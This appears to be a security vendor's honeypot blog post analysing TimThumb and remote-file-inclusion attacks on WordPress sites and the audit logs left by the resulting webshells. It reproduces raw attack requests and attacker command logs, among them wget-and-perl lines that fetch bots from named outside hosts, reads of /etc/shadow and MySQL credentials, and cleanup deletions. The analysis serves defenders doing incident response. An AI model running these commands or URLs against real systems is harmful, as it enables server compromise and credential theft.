[Honeypot Alert] Inside the Attacker's Toolbox: Webshell Usage Logging

In a previous blog post, we discussed the common lifecycle of web server botnet recruitment. While installing perl IRC botnet scripts is a common tactic for post-exploitation, it is by no means the only method used to interact with or control compromised websites. This blog post will outline how attacker utilize webshell/backdoor webpages and the audit log file often left behind.

Initial Compromise

The initial attack vector most often used is either Remote File Inclusion (RFI) or WordPress Timthumb plugin PHP Code Execution. Here are example attacks which were captured today in our web honeypots:

200.151.187.18 - - [19/Jun/2013:00:54:20 +0200] "GET /wp-content/themes/Apz.v1.0.2/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:11:03 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:11:33 +0200] "GET /wp-content/themes/Apz/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:12:43 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:14:06 +0200] "GET /wp-content/themes/announcement/functions/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:14:08 +0200] "GET /logs/wp-content/themes/announcement/functions/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:15:34 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:22:49 +0200] "GET /wp-content/themes/Apz/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:24:33 +0200] "GET /wp-content/themes/Apz/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:29:47 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:04:10:54 +0200] "GET /wp-content/themes/TheSource/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:05:03 +0200] "GET //wp-content/themes/cadabrapress/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:05:04 +0200] "GET /logs//wp-content/themes/cadabrapress/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:09:55 +0200] "GET //wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 348 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:18:29 +0200] "GET //wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 348 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:07:13:11 +0200] "GET //wp-content/themes/versatile?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 307 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:07:13:12 +0200] "GET /logs//wp-content/themes/versatile?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:25:15 +0200] "GET //wp-content/themes/groovyvideo/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:32:33 +0200] "GET //wp-content/themes/Galleria/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:33:48 +0200] "GET //wp-content/themes/groovyvideo/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:41:43 +0200] "GET //wp-content/themes/yamidoo/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:42:34 +0900] "GET /wp-content/themes/ecobiz/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 243
200.151.187.18 - - [19/Jun/2013:08:58:39 +0200] "GET //wp-content/themes/TheCorporation/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:09:01:47 +0200] "GET //wp-content/themes/TheCorporation/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:09:20:11 +0200] "GET //wp-content/themes/EspOptimizePress/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:03:53 +0200] "GET //wp-content/themes/corporattica/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:14:38 +0900] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 237
200.151.187.18 - - [19/Jun/2013:10:20:37 +0200] "GET //wp-content/themes/digitalfarm/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:24:49 +0900] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 237
200.151.187.18 - - [19/Jun/2013:10:28:17 +0200] "GET //wp-content/themes/DelicateNews/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:28:51 +0200] "GET //wp-content/themes/kingsize/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:30:22 +0900] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 237
200.151.187.18 - - [19/Jun/2013:10:34:50 +0200] "GET //wp-content/themes/bigeasy/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:40:37 +0200] "GET //wp-content/themes/ibuze/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:40:59 +0200] "GET //wp-content/themes/ibuze/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:41:20 +0200] "GET //wp-content/themes/duotive-?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:43:09 +0200] "GET //wp-content/themes/duotive-?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:43:10 +0200] "GET /logs//wp-content/themes/duotive-?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:59:41 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:59:42 +0200] "GET /logs//wp-content/themes/welcome_inn/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:11:26:11 +0200] "GET //wp-content/themes/premiumnews/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:12:24:58 +0900] "GET //wp-content/themes/classifiedstheme/thumbs/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 249
200.151.187.18 - - [19/Jun/2013:14:20:43 +0900] "GET /wp-content/themes/wpuniversity/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 257
200.151.187.18 - - [19/Jun/2013:14:26:34 +0900] "GET /wp-content/themes/wpuniversity/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 257
200.151.187.18 - - [19/Jun/2013:15:33:15 +0900] "GET //wp-content/themes/Galleria/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 246
200.151.187.18 - - [19/Jun/2013:16:02:13 +0900] "GET //wp-content/themes/MyResume/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 246
200.151.187.18 - - [19/Jun/2013:17:15:16 +0900] "GET //wp-content/themes/eVidTheme/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 247

In all of these examples, the attacker is attempting to trick the PHP application into downloading/executing the remote file - hxxp://flickr.com.golfpops.com/thumbid.php.

Post-Compromise Actions

This webshell has functionality similar to the following redacted example -

Screen Shot 2013-06-19 at 2.40.04 PM
This webshell provides extensive funcationality for the attacker. In this screenshot, the attacker is using the "View File" component. The resulting URL looks likes this -

http://VICTIM_SITE/wp-includes/theme-compat/wp-targz.php?x=f&f=wp-config.php&d=%2Fhome%2Ffoo%2Fpublic_html &cd=2&hl=en&ct=clnk&gl=us

The "f" parameter is the file that the attacker is now viewing through this webshell. As you can see, the attacker is able to inspect the wp-config.php file contents which disclose sensitive data such as the DB username and passwords. This type of data leakage could potentially lead to deeper compromise. Other examples of actions include:

Screen Shot 2013-06-19 at 3.26.47 PM

Attackers can even edit existing files to try and remove their tracks from logs. This screenshot shows an example of editing the Apache access_log file:

Screen Shot 2013-06-19 at 3.21.10 PM

Webshell Usage Logging

While reviewing these webshell files, we found that many include audit logging as part of the backdoor. For example, let's look at the source of that thumbid.php script again:

Screen Shot 2013-06-19 at 3.35.34 PM
This section of PHP code creates audit audit log file called "x.txt" in the document root directory of the website and it logs all interactions by web clients with this webshell. Here are some examples that SpiderLabs has obtained which shows past commands used.

Example 1:

Day  : Mon, 03 Jun 2013 22:05:39 -0300IP  : 188.83.6.147Browser  : Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0Url  : /wp-content/themes/sakura/plugins/woo-tumblog/functions/cache/03e91508ab1a6811d2e16df4081c4b36.phpLast Command : id_____________________________________________________________________________________Day  : Mon, 03 Jun 2013 22:05:52 -0300IP  : 188.83.6.147Browser  : Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0Url  : /wp-content/themes/sakura/plugins/woo-tumblog/functions/cache/03e91508ab1a6811d2e16df4081c4b36.phpLast Command : wget http://mail.ebsuccess.com/accounts/inc/bot1.txt; perl bot1.txt; rm -rf bot1.txt_____________________________________________________________________________________

These entries show that the attacker first ran the "id" command to see what user the webshell was running as. She then downloaded a file, executed it and then removed the file to cleanup.

Example 2:

Day     : Wed, 05 Jun 2013 19:36:43 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : edit_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:37:54 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:38:19 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : wget http://193.180.115.30/~online/php/c100.gif ; mv c100.gif fantastico.php ; chmod +x *.php ; ls -alF_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:40:18 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : cat .htaccess_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 19:40:47 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : wget http://193.180.115.30/~online/ftp ; ls -alF ftp* ; perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:41:24 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : hostname ; /sbin/ifconfig | grep inet ; cat /etc/passwd /etc/shadow /root/.my.cnf /etc/group ; ls -alF /etc/passwd /etc/shadow /root/.my.cnf /etc/group_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 19:42:02 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : netstat -an | grep -i listen_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:46:06 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : rm -f ftp ftp.txt ; ls -al_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:47:16 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : cat /home/XXXX/public_html/blog/configuration.php_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:47:56 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : find `pwd` -type f -name \"*thumb*.php\" -exec ls -alF {} \\;_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:59:54 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : wget http://193.180.115.30/~online/ftp ; ls -alF ftp*_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:00:03 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : edit_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:00:56 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:01:05 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:03:29 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : edit_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:04:02 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:04:19 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:05:31 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:06:57 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:07:10 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:09:34 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:10:01 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:10:08 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:11:08 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:11:12 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:12:34 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:12:46 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:17:01 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:17:16 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Thu, 06 Jun 2013 13:30:30 -0500IP      : 109.167.225.109Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : rm -f ftp ftp.txt ; ls -alF_____________________________________________________________________________________

This particular attacker executed many commands as you can see. The most notable of which was to download and run this program -

Screen Shot 2013-06-19 at 3.55.53 PM
The "confspy.pl" script will search home directories for users and attempt to steal their FTP credentials. Knowing that a tool like this has been run on your system widens the scope of compromise and would require your users to change all passwords to help prevent the attacker from re-gaining access even if you were to patch the original Timthumb attack vector.

Takeaways

After analyzing these types of webshell backdoors for quite some time, it is clear that the majority of these attackers are simply re-using webshells written by others. They simply modify the page TITLE or color scheme to take some cosmetic ownership of the code. This is one of the main reasons why this audit logging code persists in these webshells. In addition to the more common audit log name of "x.txt" you should also look for "logx.txt" as that has been see quite frequently as well. Hopefully this information will help you if you find that your website has been compromised and you are trying to identify what actions the attacker executed.

Trustwave reserves the right to review all comments in the discussion below. Please note that for security and other reasons, we may not approve comments containing links.